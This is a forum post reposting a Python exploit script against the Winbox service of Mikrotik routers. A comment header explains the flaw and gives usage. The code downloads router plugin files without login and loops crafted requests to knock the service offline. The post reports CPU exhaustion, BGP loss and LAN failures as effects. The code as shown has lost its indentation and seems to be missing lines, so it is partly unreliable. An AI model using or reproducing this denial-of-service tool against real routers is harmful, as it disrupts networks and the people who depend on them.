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  #1 Old 08-31-2013, 05:34 PM
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Default Mikrotik Router Denial of Service !!!

# Exploit Title: Mikrotik Router Remote Denial Of Service attack
# Date: 19/4/2012
# Author: PoURaN @ 133tsec.com
# Software Link: http://www.mikrotik.com
# Version: All mikrotik routers with winbox service enabled are affected (still a 0day 30/5/2012)
# Tested on: Mikrotis RouterOS 2.9.6 up to 5.15
# Vulnerability Description
# ===========================
# DETAILS & PoC VIDEO : http://www.133tsec.com/2012/04/30/0d...e-ddos-attack/
# The denial of service, happens on mikrotik router's winbox service when
# the attacker is requesting continuesly a part of a .dll/plugin file, so the service
# becomes unstable causing every remote clients (with winbox) to disconnect
# and denies to accept any further connections. That happens for about 5 minutes. After
# the 5 minutes, winbox is stable again, being able to accept new connections.
# If you send the malicious packet in a loop (requesting part of a file right after
# the service becoming available again) then you result in a 100% denial of winbox service.
# While the winbox service is unstable and in a denial to serve state, it raises router's CPU 100%
# and other actions. The "other actions" depends on the router version and on the hardware.
# For example on Mikrotik Router v3.30 there was a LAN corruption, BGP fail, whole router failure
# => Mikrotik Router v2.9.6 there was a BGP failure
# => Mikrotik Router v4.13 unstable wifi links
# => Mikrotik Router v5.14/5.15 rarely stacking
# =>>> Behaviour may vary most times, but ALL will have CPU 100% . Most routers loose BGP after long time attack <<<=
# The exploit
# =============
# This is a vulnerability in winbox service, exploiting the fact that winbox lets you download files/plugins
# that winbox client needs to control the server, and generally lets you gain basic infos about the service BEFORE
# user login!
# Sending requests specially crafted for the winbox service, can cause a 100% denial of winbox service (router side).
# This script, offers you the possibility to download any of the dlls that can be downloaded from the router one-by-one
# or alltogether! (look usage for more info) .. The file must be contained in the router's dll index.
# The dlls downloaded, are in the format of the winbox service.. Meaning that they are compressed with gzip and they
# have 0xFFFF bytes every 0x101 bytes (the format that winbox client is expecting the files)
# These DLLs can be used by the "Winbox remote code execution" exploit script
# Usage
# =======
# Use the script as described below:
# 1. You can download ALL the files of the router's dll index using the following command:
# python mkDl.py * 1
# the "1" in the end, is the speed.. "Speed" is a factor I added, so the script delays a bit while receiving
# information from the server. It is a MUST for remote routers when they are in long distance (many hops) to use
# a slower speed ( 9 for example ).
# Also in the beginning of the dlls file list, script shows you the router's version (provided by router's index)
# 2. You can download a specific .dll file from the remote router.
# python mkDl.py roteros.dll 1
# In this example i download roteros.dll (which is the biggest and main plugin) with a speed factor of 1 (very fast)
# Because roteros and 1-2 other files are big, you have to request them in different part (parts of 64k each)
# That is a restriction of winbox communication protocol.
# If you don't know which file to request, make a "*" request first (1st usage example), see the dlls list, and press ctrl-c
# to stop the script.
# 3. You can cause a Denial Of Service to the remote router.. Means denial in winbox service or more (read above for more)
# python mkDl.py DoS
# This command starts requesting from router's winbox service the 1st part of roteros.dll looping the request
# and causing DoS to the router. The script is requesting the file till the router stops responding to the port (8291)
# Then it waits till the service is up again (using some exception handling), then it requests again till the remote
# service is down again etc etc... The requests lasts for about 2 seconds, and the router is not responding for about
# 5 minutes as far as i have seen from my tests in different routeros versions.
# <> Greetz to mbarb, dennis, andreas, awmn and all mighty researchers out there! keep walking guys <>
import socket, sys, os, struct, random, time

def InitConnection(mikrotikIP, speed):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((mikrotikIP, 8291))
data = s.recv(1024) # receiving dll index from server
if data.find("\xFF\x02"+"index"+"\x00") > -1:
print "[+] Index received!"
print "[+] Wrong index.. Exiting.."
return s

def download(filename, speed, s):
f = open(filename, 'wb')
if len(filename) < 13 and len(filename) > 6:
print "[+] Requesting file ", filename, ' <->'
winboxStartingFileReq = RequestHeader + filename.ljust(12, '\x00') + RequestFirstFooter
dataReceived = s.recv(1)
if dataReceived[0:1]=='\xFF':
print "[+] Receiving the file..."
f.write(dataReceived) # written 1st byte
dataReceived = s.recv(0x101) # 0x100 + 1
nextPartFingerprint = struct.unpack('>H', dataReceived[14:16])[0]
if dataReceived[0:1]=='\x02':
f.write(dataReceived) # written 1st chunk 0x102 bytes with header in file.
dataReceived = s.recv(0x102) # 1st sequence of (0xFF 0xFF)
bytesToRead = int(dataReceived[len(dataReceived)-2].encode('hex'), 16) + 2
f.write(dataReceived) # write the next 0x102 bytes (total 0x102+0x102 in file)
print "[-] Wrong data received..(2)"
print "[-] Wrong data received..(1)"

bigFileCounter = 0xFFED
packetsCounted=0 # counter for the 0x101 packet counts. Every time a file is requested this counter is 0
fileRequested=0 # every time a file needs to be requested more than 1 time, this is it's counter.
while 1: # header of file done.. Now LOOP the body..
packetsCounted+=1 # dbg
dataReceived = s.recv(bytesToRead)
if (bytesToRead <> len(dataReceived)) and packetsCounted==255: # an den diavazei osa bytesToRead prepei, simainei oti eftase sto telos i lipsi tou part pou katevazoume
packetsCounted = -1
print '[+] Next file part : ', fileRequested
s.send(RequestHeader + filename.ljust(12, '\x00') + '\xFF\xED\x00' + struct.pack('=b',fileRequested) + struct.pack('>h',bigFileCounter))
dataReceived = s.recv(0x101 + 2) # Reads the new header of the new part!!!
nextPartFingerprint = struct.unpack('>H', dataReceived[14:16])[0]
bytesToRead = int(dataReceived[len(dataReceived)-2].encode('hex'), 16)
fileRequested += 1
bigFileCounter -= 0x13
bytesToRead = int(dataReceived[len(dataReceived)-2].encode('hex'), 16) # den prostheto 2 tora giati to teleutaio den einai ff.. einai akrivos to size pou paramenei..
if bytesToRead==0xFF: # kalipto tin periptosi opou to teleutaio struct den einai ff alla exei to size pou apomenei
bytesToRead += 2
if bytesToRead != 0x101 and nextPartFingerprint < 65517: # dikaiologountai ta liga bytes otan teleiose ena apo ta parts tou file
dataReceived = s.recv(bytesToRead)
if bytesToRead != 0x101 and nextPartFingerprint==65517: # ligotera bytes KAI fingerprint 65517 simainei corrupted file..
print '[-] File download terminated abnormaly.. please try again probably with a slower speed..'
if fileRequested < 1: print '[+] File was small and was downloaded in one part\n[+] Downloaded successfully'
else: print '[+] File '+filename+' downloaded successfully'

def Flood(s):
filename = 'roteros.dll'
f = 'we\'r not gonna use I/O to store the data'
print "[+] Requesting file ", filename, ' till death '
winboxStartingFileReq = RequestHeader + filename.ljust(12, '\x00') + RequestFirstFooter
dataReceived = s.recv(1)
if dataReceived[0:1]=='\xFF':
f = dataReceived # written 1st byte
dataReceived = s.recv(0x101) # 0x100 + 1
nextPartFingerprint = struct.unpack('>H', dataReceived[14:16])[0]
if dataReceived[0:1]=='\x02':
f = dataReceived # written 1st chunk 0x102 bytes with header in file.
dataReceived = s.recv(0x102) # 1st sequence of (0xFF 0xFF)
bytesToRead = int(dataReceived[len(dataReceived)-2].encode('hex'), 16) + 2
f = dataReceived # write the next 0x102 bytes (total 0x102+0x102 in file)
print "[-] Wrong data received..(2)"
print "[-] Wrong data received..(1)"

bigFileCounter = 0xFFED
packetsCounted=0 # counter for the 0x101 packet counts. Every time a file is requested this counter is 0
fileRequested=0 # every time a file needs to be requested more than 1 time, this is it's counter.
while 1:
s.send(RequestHeader + filename.ljust(12, '\x00') + '\xFF\xED\x00' + struct.pack('=b',fileRequested) + struct.pack('>h',bigFileCounter))
print '- Sending evil packet.. press CTRL-C to stop -'
print 'Connection reseted by server.. trying attacking again'

################################################## ################################################## ###########
########################################### SCRIPT BODY STARTS HERE ###########################################
global RequestHeader
RequestHeader = ('\x12\x02')
global RequestFirstFooter
RequestFirstFooter = ('\xFF\xED\x00\x00\x00\x00')

global winboxStartingIndex
winboxStartingIndex=(RequestHeader + 'index' + '\x00'*7 + RequestFirstFooter)
winboxStartingFileReq=(RequestHeader + '\x00'*12 + RequestFirstFooter)

print '\n[Winbox plugin downloader]\n\n'

if len(sys.argv)==3:
if sys.argv[2]=='DoS': # if i combine both checks in 1st if, there will be error.. guess why..
print '[+] Hmmm we gonna attack it..'
mikrotikIP = sys.argv[1]
filename = sys.argv[2]
while 1:
s = InitConnection(mikrotikIP, speed)

if len(sys.argv)<>4:
print 'Usage : '+sys.argv[0]+' <mikrotik_ip> <filename_to_download> <speed>\n\t<speed>:\t [from 0 to 9] 1=faster, 9=slower but more reliable\n'

mikrotikIP = sys.argv[1]
filename = sys.argv[2]
speed = int(sys.argv[3])
if speed>9 or speed<1:
print 'Speed must be between 1 and 9 else there are unexpected results!'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((mikrotikIP, 8291))
data = s.recv(1024) # receiving dll index from server

if filename.find('*') > -1:
DllList = data.split('\x0a')
print 'Mikrotik\'s version is '+DllList[1].split(' ')[3]+'\nThe following Dlls gonna be requested :'
for i in range(0, len(DllList)-1):
print DllList[i].split(' ')[2]
raw_input('> Press enter to continue <')
for extractedDlls in range(0, len(DllList)-1):
print "[+] Requesting ", DllList[extractedDlls].split(' ')[2]
filename=DllList[extractedDlls].split(' ')[2]
s = InitConnection(mikrotikIP, speed)
download(filename, speed, s)
s = InitConnection(mikrotikIP, speed)
download(filename, speed, s)
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